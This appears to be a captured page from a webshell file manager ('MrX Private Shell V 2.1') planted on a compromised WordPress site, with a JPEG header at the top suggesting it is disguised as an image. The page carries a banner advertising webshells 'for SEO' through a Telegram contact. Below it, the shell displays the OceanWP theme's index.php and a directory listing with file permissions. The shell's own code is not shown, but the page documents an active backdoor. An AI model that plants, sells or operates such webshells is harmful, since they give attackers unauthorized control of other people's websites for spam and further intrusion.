����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* The main template file.
*
* This is the most generic template file in a WordPress theme and one of the
* two required files for a theme (the other being style.css).
* It is used to display a page when nothing more specific matches a query.
* For example, it puts together the home page when no home.php file exists.
*
* Learn more: http://codex.wordpress.org/Template_Hierarchy
*
* @package OceanWP WordPress theme
*/
get_header(); ?>
<?php do_action( 'ocean_before_content_wrap' ); ?>
<div id="content-wrap" class="container clr">
<?php do_action( 'ocean_before_primary' ); ?>
<div id="primary" class="content-area clr">
<?php do_action( 'ocean_before_content' ); ?>
<div id="content" class="site-content clr">
<?php do_action( 'ocean_before_content_inner' ); ?>
<?php
// Check if posts exist.
if ( have_posts() ) :
// Elementor `archive` location.
if ( ! function_exists( 'elementor_theme_do_location' ) || ! elementor_theme_do_location( 'archive' ) ) {
// Add Support For EDD Archive Pages.
if ( is_post_type_archive( 'download' ) || is_tax( array( 'download_category', 'download_tag' ) ) ) {
do_action( 'ocean_before_archive_download' );
?>
<div class="oceanwp-row <?php echo esc_attr( oceanwp_edd_loop_classes() ); ?>">
<?php
// Archive Post Count for clearing float.
$oceanwp_count = 0;
while ( have_posts() ) :
the_post();
$oceanwp_count++;
get_template_part( 'partials/edd/archive' );
if ( oceanwp_edd_entry_columns() === $oceanwp_count ) {
$oceanwp_count = 0;
}
endwhile;
?>
</div>
<?php
do_action( 'ocean_after_archive_download' );
} else {
?>
<div id="blog-entries" class="<?php oceanwp_blog_wrap_classes(); ?>">
<?php
// Define counter for clearing floats.
$oceanwp_count = 0;
?>
<?php
// Loop through posts.
while ( have_posts() ) :
the_post();
?>
<?php
// Add to counter.
$oceanwp_count++;
?>
<?php
// Get post entry content.
get_template_part( 'partials/entry/layout', get_post_type() );
?>
<?php
// Reset counter to clear floats.
if ( oceanwp_blog_entry_columns() === $oceanwp_count ) {
$oceanwp_count = 0;
}
?>
<?php endwhile; ?>
</div><!-- #blog-entries -->
<?php
// Display post pagination.
oceanwp_blog_pagination();
}
}
?>
<?php
// No posts found.
else :
?>
<?php
// Display no post found notice.
get_template_part( 'partials/none' );
?>
<?php endif; ?>
<?php do_action( 'ocean_after_content_inner' ); ?>
</div><!-- #content -->
<?php do_action( 'ocean_after_content' ); ?>
</div><!-- #primary -->
<?php do_action( 'ocean_after_primary' ); ?>
</div><!-- #content-wrap -->
<?php do_action( 'ocean_after_content_wrap' ); ?>
<?php get_footer(); ?>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| assets | Folder | 0755 |
|
|
| inc | Folder | 0755 |
|
|
| languages | Folder | 0755 |
|
|
| partials | Folder | 0755 |
|
|
| sass | Folder | 0755 |
|
|
| templates | Folder | 0755 |
|
|
| tribe-events | Folder | 0755 |
|
|
| woocommerce | Folder | 0755 |
|
|
| 404.php | File | 4.56 KB | 0644 |
|
| 500.php | File | 211 B | 0644 |
|
| comments.php | File | 5.1 KB | 0644 |
|
| footer-pwa.php | File | 166 B | 0644 |
|
| footer.php | File | 1.67 KB | 0644 |
|
| functions.php | File | 36.84 KB | 0644 |
|
| header-pwa.php | File | 437 B | 0644 |
|
| header.php | File | 1.01 KB | 0644 |
|
| image.php | File | 1.38 KB | 0644 |
|
| index.php | File | 3.06 KB | 0644 |
|
| offline.php | File | 210 B | 0644 |
|
| rtl.css | File | 17.32 KB | 0644 |
|
| searchform.php | File | 1.05 KB | 0644 |
|
| sidebar-left.php | File | 737 B | 0644 |
|
| sidebar.php | File | 872 B | 0644 |
|
| singular.php | File | 1.65 KB | 0644 |
|
| style.css | File | 2.09 KB | 0644 |
|